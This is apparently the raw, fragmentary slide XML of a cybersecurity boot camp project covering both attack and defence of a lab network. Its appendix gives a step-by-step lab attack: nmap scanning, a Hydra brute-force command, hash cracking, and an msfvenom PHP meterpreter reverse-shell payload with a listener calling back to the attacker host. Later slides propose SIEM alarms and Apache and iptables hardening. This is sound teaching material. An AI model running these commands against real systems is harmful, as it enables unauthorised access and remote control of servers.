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2FA56F-96CE-4569-B98D-B90C8F88EE2B}">
  <a:tblStyle styleId="{202FA56F-96CE-4569-B98D-B90C8F88EE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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28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e2f660cdf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e2f660cd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e30c9e835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e30c9e835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e30c9e835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e30c9e835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e30c9e835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e30c9e835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e30c9e835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e30c9e835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e30c9e835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e30c9e835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e30c9e835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e30c9e835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4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3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Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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4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Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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7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59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68.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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2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8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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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89.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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78.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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Development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Instructor Demonstration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UX/UI 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Hardening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Alarm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01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02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03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04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05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Cybersecurity Boot Camp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Analytics and Visualization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FIST TO FIVE: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Time’s Up! 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Let’s Review.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Take a Break!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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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192.168.1.105/webdav/*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Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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OLANREWAJU IGE JULY,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[Remote shell backdoor ]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1139" name="Google Shape;113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Metasploit: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Msfconsole and Msfvenom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Msfvenom helped in crafting malicious payloads php/meterpreter_reverse_tcp.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Established a listener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Reverse backdoor was created when the Local Hosts and required payload was set appropriately.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2" name="Google Shape;1142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3" name="Google Shape;114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4" name="Google Shape;114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6" name="Google Shape;114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7" name="Google Shape;114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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496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Msfvenom crafted payload php/meterpreter_reverse_tcp.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Msfconsole granted reverse Meterpreter/shell connection with the webserver, allowing post exploitation, privilege escalation and being able to view root directory and other directory and files present in the webserver.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0" name="Google Shape;1150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1" name="Google Shape;115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2" name="Google Shape;115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3" name="Google Shape;1153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5" name="Google Shape;11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675" y="2592962"/>
            <a:ext cx="3300324" cy="190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Log Analysis and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Attack Characterization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8" name="Google Shape;116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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="675975"/>
            <a:ext cx="8255700" cy="680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occur at about July 7, 2021 23:00 WAT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231 hits were sent from IP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Multiple ports requested at the same time indicative of a port scan.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1171" name="Google Shape;11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7800"/>
            <a:ext cx="8820302" cy="32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7" name="Google Shape;117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66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421925" y="741300"/>
            <a:ext cx="9032400" cy="675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 occurred at about and there were 1,448,246 mostly inclusive of the brute for attack.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requested files was connect_corp_server and contains information about CEO Ryan and webdav connection instructions</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1180" name="Google Shape;11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50" y="1416600"/>
            <a:ext cx="8709802" cy="34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6" name="Google Shape;1186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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462100" y="741300"/>
            <a:ext cx="8409300" cy="645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1,448,246 requests were made in the attack.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1,448,242 requests were made before the attacker discovered the password.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1189" name="Google Shape;11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75" y="1432600"/>
            <a:ext cx="8920776" cy="33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5" name="Google Shape;1195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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380575" y="741300"/>
            <a:ext cx="9073800" cy="726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1,448,246 requests were made in the attack.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1,448,242 requests were made before the attacker discovered the password.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1198" name="Google Shape;11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5" y="1467900"/>
            <a:ext cx="9073675" cy="34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4" name="Google Shape;1204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5" name="Google Shape;1205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249 requests were made to the webdav directory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Files requested were passwd.dav and shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1208" name="Google Shape;12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00" y="1467775"/>
            <a:ext cx="8620200" cy="26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Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Mitigation Strategies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22" name="Google Shape;122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What kind of alarm can be set to detect future port scans?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Destination.ip:192.168.1.105 and source.ip(not 192.168.1.105) and destination.port(not “80” or “443”)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Number of ports accessed per source IP per second.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What threshold would you set to activate this alarm?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Alert emails and logs when threshold &gt; 3 for none port 443 or port 80 scans detected at the same timestamp from the same IP occur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71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4339825" y="1386325"/>
            <a:ext cx="4761900" cy="3517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We can create ipset list then set iptable rules helps to mitigate against port scanning.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ipset create port_scanners hash:ip family inet hashsize 32768 maxelem 65536 timeout 600 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ipset create scanned_ports hash:ip,port family inet hashsize 32768 maxelem 65536 timeout 60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iptables -A INPUT -m state --state INVALID -j DROP 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iptables -A INPUT -m state --state NEW -m set ! --match-set scanned_ports src,dst -m hashlimit --hashlimit-above 1/hour --hashlimit-burst 5 --hashlimit-mode srcip --hashlimit-name portscan --hashlimit-htable-expire 10000 -j SET --add-set port_scanners src --exist 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iptables -A INPUT -m state --state NEW -m set --match-set port_scanners src -j DROP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iptables -A INPUT -m state --state NEW -j SET --add-set scanned_ports src,dst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Portknocking with portspoofing is another effective way of  mitigating against port scanning attacks.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30" name="Google Shape;123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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1416475"/>
            <a:ext cx="4298400" cy="3487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000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>following alarm can be set to detect future unauthorized access: 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We could set an alert if 401 Unauthorized is returned from any server on a particular sensitive directory ie /company_folders/secret_folder as in this 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scenario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over a certain threshold that would weed out forgotten passwords.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We can start with a threshold of 1 in one hour and then do other refining.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Search criteria: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source.ip: (not 192.168.1.105 or 192.168.1.1) and url.path : http://192.168.1.105/company_folders/secret_folder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Alarm criteria/threshold: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Alert email and log when &gt; 1 access is detected on “secret_folder” from IPs other than 192.168.1.105 or 192.168.1.1.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2" name="Google Shape;1232;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1416475"/>
            <a:ext cx="4835700" cy="37269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We can modify the host configuration file, to reconfigure the web-server to restrict IP access in httpd.conf as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Open your httpd.conf file: &gt;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nano /etc/httpd/conf/httpd.conf *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Locate directory section (/var/www/) and set it as follows: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&lt;Directory/var/www/http://192.168.1.105/company_folders/secret_folder&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"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latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Order allow,deny </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"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latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Deny all </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"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latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Allow from 192.168.1.1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"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latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Allow from 192.168.1.105 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"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latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Allow from 127.0.0.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"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latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;/Directory&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"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latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Disabling Directory listing is a good hardening skill</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"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&lt;Directory/var/www/http://192.168.1.105/company_folders/secret_folder&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="10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Options None</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="10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Order allow,deny</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="10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Allow from all</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="10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&lt;/Directory&gt;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8" name="Google Shape;123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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1396375"/>
            <a:ext cx="4298400" cy="35079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What kind of alarm can be set to detect future brute force attacks?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could set an alert if 401 Unauthorized is returned from any server on a particular sensitive directory ie /company_folders/secret_folder as in this scenario over a certain threshold that would weed out forgotten passwords.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start with a threshold of 10 in one hour and then do other refining.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criteria:</a:t>
            </a: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source.ip:192.168.1.90 and destination.ip:192.168.1.105 and url.path:"http://192.168.1.105/company_folders/secret_folder/" and user_agent.original :"Mozilla/4.0 (Hydra)" and http.response.status :401 </a:t>
            </a:r>
            <a:b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 criteria:</a:t>
            </a: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times Error (401) response detected can be set to a threshold of 10.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Alarm criteria/threshold: </a:t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 email when log attempts on protected files and folders &gt; 10 for Error (401) responses occur at any time from untrusted IPs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0" name="Google Shape;1240;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1398600"/>
            <a:ext cx="4298400" cy="35079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What configuration can be set on the host to block brute force attacks?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latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Using Multifactor Authentication for login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Account lock-out policy should be implemented.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Strong password policy should be employed.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Using CAPTCHA to ensure interaction is human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Whitelisting only my IP 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access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to login to admin account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Describe the solution. If possible, provide the required command line(s).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46" name="Google Shape;124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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1406425"/>
            <a:ext cx="4298400" cy="3497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will create an alert anytime this directory is accessed by a machine </a:t>
            </a:r>
            <a:r>
              <a:rPr i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than the machine that should have access.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Search criteria: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source.ip: (not 192.168.1.105 or 192.168.1.1) and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http.request.method : * and url.path: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http://192.168.1.105/webdav/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Report criteria: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Number of times the directory is requested from untrusted IPs.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Alarm criteria/threshold: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Alert email and log are set to the threshold &gt;0 on protected files and folders from untrusted IPs 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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286100" y="1408800"/>
            <a:ext cx="4479000" cy="3497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br>
              <a:rPr lang="en" sz="1400"/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Connections to this shared folder should not be accessible from the web interface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Connections to this shared folder could be restricted by machine with a firewall rule.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This rule can be set on httpd.conf file in the host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Open your httpd.conf file: &gt;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nano /etc/httpd/conf/httpd.conf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 Locate directory section (/var/www/) and set it as follows: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&lt;Directory/var/www/webdav&gt;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Order allow,deny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Allow from 192.168.1.1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 Allow from 192.168.1.105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Allow from 127.0.0.1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Deny from all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&lt;/Directory&gt;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4" name="Google Shape;1254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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1436575"/>
            <a:ext cx="4298400" cy="3467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What kind of alarm can be set to detect future file uploads? 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Meterpreter section runs on a default port 4444, a lot of attackers tend to forget to change this port during their attack. We can set our alarms to watch activities on the port:4444.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So setting my search in the following settings.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Search criteria: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source.ip:(not 192.168.1.105 or 192.168.1.1) and  destination.ip:192.168.1.105 and destination.port:4444 and not source.port:(80 and 443)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Report criteria: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Put a count on the traffic moving in from port 4444 and also an alert to detect http.request.method: PUT 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.php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being uploaded.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Alarm criteria/threshold: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Alert  email and logs threshold should be &gt;0 when port other than 80 and 443 are being accessed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6" name="Google Shape;1256;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1438800"/>
            <a:ext cx="4298400" cy="3467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What configuration can be set on the host to block file uploads?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httpd.conf host files are being modified to block unwanted access and uploading of files. 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We can also install anti-malware systems.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Open your httpd.conf file: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&gt; nano /etc/httpd/conf/httpd.conf (location may vary)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Locate directory section (/var/www/) and set it as follows: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&lt;Directory /var/www/webdav/&gt;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Order allow,deny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Allow from 192.168.1.1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Allow from 192.168.1.105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Allow from 127.0.0.1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Deny from all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&lt;LimitExcept GET POST HEAD&gt;deny from all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&lt;/LimitExcept&gt;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&lt;/Directory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Describe the solution. If possible, provide the required command line.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76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APPENDIX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Google Shape;1263;p7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1: Codes, resources and proof of concept</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1269" name="Google Shape;1269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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="813725"/>
            <a:ext cx="9144000" cy="405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Instructions for PHP Reverse Shell Exploit using msfvenom msfconsole hydra from Kali Linux - Discover the IP address of the Kali Linux server by running ifconfig on the kali terminal.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We discovered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### Host Discovery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**Scan for open ports, no icmp pings ,Version and OS detection over the subnet**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&gt; nmap -Pn -sV -A 192.168.1.0/24 : found all host on the subnet within CIDR block on /24 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	Result ip host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> : 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192.168.1.1 (open ports: 135;139;445;2179;3389)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	192.168.1.100 (open ports: 22;9200)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192.168.1.105 (open ports:22;80)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192.168.1.90 (open ports:22)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1: codes and resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="Google Shape;127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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="813725"/>
            <a:ext cx="9144000" cy="405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*Continued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**Brute force the password for the hidden directory using Hydra**: &gt;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hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder/` 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host: 192.168.1.105 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login: ashton password: leopoldo - Login to secret folder:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>          192.168.1.105/company_folders/secret_folder/  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login: ashton password: leopoldo -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Read file: connect_to_corp_server instructions for accessing server : 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 Kali, navigate to Network File Manager/Browse Network dav://192.168.1.105/webdav/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- Breaking the hashed password for Ryan’s account with the https://crackstation.net/ website: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Hash 							Type 				Result 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d7dad0a5cd7c8376eeb50d69b3ccd352 		md5 				linux4u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1: codes and resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283" name="Google Shape;1283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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="813725"/>
            <a:ext cx="9144000" cy="405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lang="en"/>
              <a:t>Continued…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- Connect to the server via WebDav. `192.168.1.105/webdav/`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login: ryan pass: linux4u -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Upload a PHP reverse shell payload...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## create the payload - Attacker IP: 192.168.1.90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&gt; msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.90 LPORT=4444 -f raw &gt; shell.php`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## copy payload to server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 Kali, navigate to Network File Manager/Browse Network: dav://192.168.1.105/webdav/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login: ryan pass: linux4u copy msfvenom payload shell.php to dav://192.168.1.105/webdav/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1: codes and resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1290" name="Google Shape;1290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80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-60100" y="643875"/>
            <a:ext cx="9144000" cy="41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Continued… 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## Start the listener &gt; msfconsole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 use exploit/multi/handler set payload php/meterpreter_reverse_tcp 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set lhost 192.168.1.90 set lport 4444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 run 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## Execute the payload - In web browser access the payload: 192.168.1.105/webdav/shell.php (If needed, login: ryan pass: linux4u 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## Your listening msfconsole will now have a meterpreter prompt ready to send commands and shell meterpreter &gt; pwd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The working directory is /var/www/webdav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 meterpreter &gt; ls ../../../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We found out that the flag was in the root folder as flag.txt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Then we can do a cat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meterpreter &gt; cat ../../../flag.txt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300"/>
              <a:t> cat /flag.txt : b1ng0w@5h1sn@m0</a:t>
            </a:r>
            <a:endParaRPr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6951750" y="910475"/>
            <a:ext cx="20997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Machines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25" y="863950"/>
            <a:ext cx="6699602" cy="39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Security Assessment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Nmap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identified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following hosts on the network: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{202FA56F-96CE-4569-B98D-B90C8F88EE2B}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highlight>
                            <a:srgbClr val="F8F9FA"/>
                          </a:highlight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JUMP-BOX CONNECTS ALL THE VIRTUAL MACHINES TOGETHER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SIEMS SYSTEM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WEB-SERVER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{202FA56F-96CE-4569-B98D-B90C8F88EE2B}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="37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Broken Authentication;  Weak password and No failed login password lockout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Successful brute forcing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attempts using Hydra against a wordlist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cracked password allowed us to gain access into the webserver and utmost the secret folder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and remote file inclusion LFI enabled on Apache webserver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Was able to read through directories and i was able to upload a payload on the webserver via webdav on my attacking machine end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attackers to gain remote access  into the webserver and dump their crafted/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payloads to allow easy access for exploitation and post exploitation.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backdoor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Was able to exploit the vulnerability by running  malicious php payload which allowed a reverse shell connection to the webserver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will be able to gain access into the webserver /var/www/webdav directory and will be able to escalate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performing several post exploitations.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[Reconnaisance and Broken Authentication]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Nmap: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map -Pn -sV -A 192.168.1.0/24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Hydra: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hydra -l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get 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forced rockyou.txt wordlist against the webserver directory /company_folders/secret_folder directory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IP and host Discovery.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Obtained ashton’s password from rockyou.txt wordlist.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Got access into the secret folder using ashton’s login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credentials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007450" y="1481375"/>
            <a:ext cx="27651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25" y="2464288"/>
            <a:ext cx="2320601" cy="11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100" y="1099350"/>
            <a:ext cx="2428628" cy="1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825" y="3368663"/>
            <a:ext cx="2428499" cy="136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[Directory listing and local File Inclusion (LFI)]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1115" name="Google Shape;111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OLANREWAJU IGE JULY,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Hash cracking: Open source tool https://crackstation.net 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Kali linux file system explorer DAV://192.168.1.105/webdav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8" name="Google Shape;1118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4" name="Google Shape;1124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Cracked the discovered hash in ashton /company_folders/secret_folder which gave us the CEO Ryan’s login credentials.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Web-server directory listing and Local file inclusion which allowed connection to the web-server through attacking machine, view through directories and was able to dump filesincluding payloads for backdoor connections.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7" name="Google Shape;112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8" name="Google Shape;112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" name="Google Shape;1129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1" name="Google Shape;11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50" y="1298750"/>
            <a:ext cx="2943451" cy="1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550" y="2087875"/>
            <a:ext cx="3162350" cy="16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275" y="3325200"/>
            <a:ext cx="3119625" cy="15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